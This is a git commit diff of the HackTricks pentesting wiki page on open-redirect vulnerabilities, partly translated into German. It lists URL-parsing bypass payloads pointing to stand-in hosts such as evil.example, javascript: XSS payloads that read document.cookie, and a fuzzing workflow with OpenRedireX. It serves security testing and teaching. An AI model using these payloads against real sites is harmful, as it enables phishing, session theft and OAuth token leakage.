mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Translated ['src/pentesting-web/open-redirect.md'] to de
This commit is contained in:
		
							parent
							
								
									2f5ffe0dfa
								
							
						
					
					
						commit
						94498d5b3c
					
				| @ -3,16 +3,27 @@ | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
| ## Offener Redirect | ||||
| ## Open redirect | ||||
| 
 | ||||
| ### Umleitung zu localhost oder beliebigen Domains | ||||
| 
 | ||||
| - If the app “allows only internal/whitelisted hosts”, try alternative host notations to hit loopback or internal ranges via the redirect target: | ||||
| - IPv4 Loopback-Varianten: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal) | ||||
| - IPv6 Loopback-Varianten: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1] | ||||
| - Trailing-Dot und Groß-/Kleinschreibung: localhost., LOCALHOST, 127.0.0.1. | ||||
| - Wildcard-DNS, die auf Loopback auflöst: lvh.me, sslip.io (z. B. 127.0.0.1.sslip.io), traefik.me, localtest.me. Diese sind nützlich, wenn nur „subdomains of X“ erlaubt sind, die Hostauflösung aber weiterhin auf 127.0.0.1 zeigt. | ||||
| - Network-path-Referenzen umgehen oft naive Validatoren, die ein Scheme voranstellen oder nur Prefixe prüfen: | ||||
| - //attacker.tld → wird als scheme-relative interpretiert und navigiert mit dem aktuellen Scheme off-site. | ||||
| - Userinfo-Tricks umgehen contains/startswith-Prüfungen gegen trusted hosts: | ||||
| - https://trusted.tld@attacker.tld/ → der Browser navigiert zu attacker.tld, aber einfache String-Prüfungen „sehen“ trusted.tld. | ||||
| - Backslash-Parsing-Verwirrung zwischen Frameworks/Browsern: | ||||
| - https://trusted.tld\@attacker.tld → einige Backends behandeln „\“ als Pfadzeichen und bestehen die Validierung; Browser normalisieren zu „/“ und interpretieren trusted.tld als userinfo, wodurch Nutzer zu attacker.tld geschickt werden. Dies tritt auch in Node/PHP URL-parser mismatches auf. | ||||
| 
 | ||||
| {{#ref}} | ||||
| ssrf-server-side-request-forgery/url-format-bypass.md | ||||
| {{#endref}} | ||||
| 
 | ||||
| ### Offener Redirect zu XSS | ||||
| ### Modern open-redirect to XSS pivots | ||||
| ```bash | ||||
| #Basic payload, javascript code is executed after "javascript:" | ||||
| javascript:alert(1) | ||||
| @ -58,7 +69,36 @@ javascript://whitelisted.com?%a0alert%281%29 | ||||
| /x:1/:///%01javascript:alert(document.cookie)/ | ||||
| ";alert(0);// | ||||
| ``` | ||||
| ## Open Redirect Hochladen von SVG-Dateien | ||||
| <details> | ||||
| <summary>Modernere URL-basierte bypass payloads</summary> | ||||
| ```text | ||||
| # Scheme-relative (current scheme is reused) | ||||
| //evil.example | ||||
| 
 | ||||
| # Credentials (userinfo) trick | ||||
| https://trusted.example@evil.example/ | ||||
| 
 | ||||
| # Backslash confusion (server validates, browser normalizes) | ||||
| https://trusted.example\@evil.example/ | ||||
| 
 | ||||
| # Schemeless with whitespace/control chars | ||||
| evil.example%00 | ||||
| %09//evil.example | ||||
| 
 | ||||
| # Prefix/suffix matching flaws | ||||
| https://trusted.example.evil.example/ | ||||
| https://evil.example/trusted.example | ||||
| 
 | ||||
| # When only path is accepted, try breaking absolute URL detection | ||||
| /\\evil.example | ||||
| /..//evil.example | ||||
| ``` | ||||
| 
 | ||||
| ``` | ||||
| </details> | ||||
| 
 | ||||
| ## Open Redirect uploading svg files | ||||
| 
 | ||||
| ```html | ||||
| <code> | ||||
| <?xml version="1.0" encoding="UTF-8" standalone="yes"?> | ||||
| @ -68,7 +108,9 @@ xmlns="http://www.w3.org/2000/svg"> | ||||
| </svg> | ||||
| </code> | ||||
| ``` | ||||
| ## Häufige Injektionsparameter | ||||
| 
 | ||||
| ## Common injection parameters | ||||
| 
 | ||||
| ``` | ||||
| /{payload} | ||||
| ?next={payload} | ||||
| @ -143,17 +185,23 @@ RedirectUrl=https://c1h2e1.github.io | ||||
| Redirect=https://c1h2e1.github.io | ||||
| ReturnUrl=https://c1h2e1.github.io | ||||
| ``` | ||||
| ## Codebeispiele | ||||
| 
 | ||||
| ## Code examples | ||||
| 
 | ||||
| #### .Net | ||||
| 
 | ||||
| ```bash | ||||
| response.redirect("~/mysafe-subdomain/login.aspx") | ||||
| ``` | ||||
| 
 | ||||
| #### Java | ||||
| 
 | ||||
| ```bash | ||||
| response.redirect("http://mysafedomain.com"); | ||||
| ``` | ||||
| 
 | ||||
| #### PHP | ||||
| 
 | ||||
| ```php | ||||
| <?php | ||||
| /* browser redirections*/ | ||||
| @ -161,16 +209,75 @@ header("Location: http://mysafedomain.com"); | ||||
| exit; | ||||
| ?> | ||||
| ``` | ||||
| ## Tools | ||||
| 
 | ||||
| ## Hunting and exploitation workflow (practical) | ||||
| 
 | ||||
| - Single URL check with curl: | ||||
| 
 | ||||
| ```bash | ||||
| curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:" | ||||
| ``` | ||||
| 
 | ||||
| - Discover and fuzz likely parameters at scale: | ||||
| 
 | ||||
| <details> | ||||
| <summary>Click to expand</summary> | ||||
| 
 | ||||
| ```bash | ||||
| # 1) Sammle historische URLs, behalte jene mit häufigen Redirect-Parametern | ||||
| cat domains.txt \ | ||||
| | gau --o urls.txt            # or: waybackurls / katana / hakrawler | ||||
| 
 | ||||
| # 2) Grep häufige Parameter und normalisiere die Liste | ||||
| rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \ | ||||
| | sed 's/\r$//' | sort -u > candidates.txt | ||||
| 
 | ||||
| # 3) Verwende OpenRedireX, um mit einem payload-Corpus zu fuzz | ||||
| cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt | ||||
| 
 | ||||
| # 4) Verifiziere interessante Treffer manuell | ||||
| awk '/30[1237]|Location:/I' results.txt | ||||
| ``` | ||||
| ``` | ||||
| </details> | ||||
| 
 | ||||
| - Vergiss nicht clientseitige Sinks in SPAs: suche nach window.location/assign/replace und framework helpers, die query/hash lesen und weiterleiten. | ||||
| 
 | ||||
| - Frameworks führen oft Fallstricke ein, wenn Redirect-Ziele aus nicht vertrauenswürdigen Eingaben (query params, Referer, cookies) abgeleitet werden. Siehe Next.js-Anmerkungen zu Redirects und vermeide dynamische Ziele, die aus Benutzereingaben abgeleitet werden. | ||||
| 
 | ||||
| {{#ref}} | ||||
| ../network-services-pentesting/pentesting-web/nextjs.md | ||||
| {{#endref}} | ||||
| 
 | ||||
| - OAuth/OIDC-Flows: Der Missbrauch von open redirectors eskaliert häufig zu account takeover durch leaking von authorization codes/tokens. Siehe dedizierte Anleitung: | ||||
| 
 | ||||
| {{#ref}} | ||||
| ./oauth-to-account-takeover.md | ||||
| {{#endref}} | ||||
| 
 | ||||
| - Server-Antworten, die Redirects ohne Location (meta refresh/JavaScript) implementieren, sind weiterhin für Phishing ausnutzbar und können manchmal verkettet werden. Grep nach: | ||||
| ```html | ||||
| <meta http-equiv="refresh" content="0;url=//evil.example"> | ||||
| <script>location = new URLSearchParams(location.search).get('next')</script> | ||||
| ``` | ||||
| ## Werkzeuge | ||||
| 
 | ||||
| - [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer) | ||||
| - OpenRedireX – fuzzer zum Erkennen von open redirects. Beispiel: | ||||
| ```bash | ||||
| # Install | ||||
| git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh | ||||
| 
 | ||||
| ## Ressourcen | ||||
| # Fuzz a list of candidate URLs (use FUZZ as placeholder) | ||||
| cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50 | ||||
| ``` | ||||
| ## Referenzen | ||||
| 
 | ||||
| - In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) finden Sie Fuzzing-Listen. | ||||
| - Unter https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect finden Sie Fuzzing-Listen. | ||||
| - [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) | ||||
| - [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) | ||||
| - [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a) | ||||
| 
 | ||||
| - PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection | ||||
| - OpenRedireX – Ein Fuzzer zur Erkennung von open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
|  | ||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user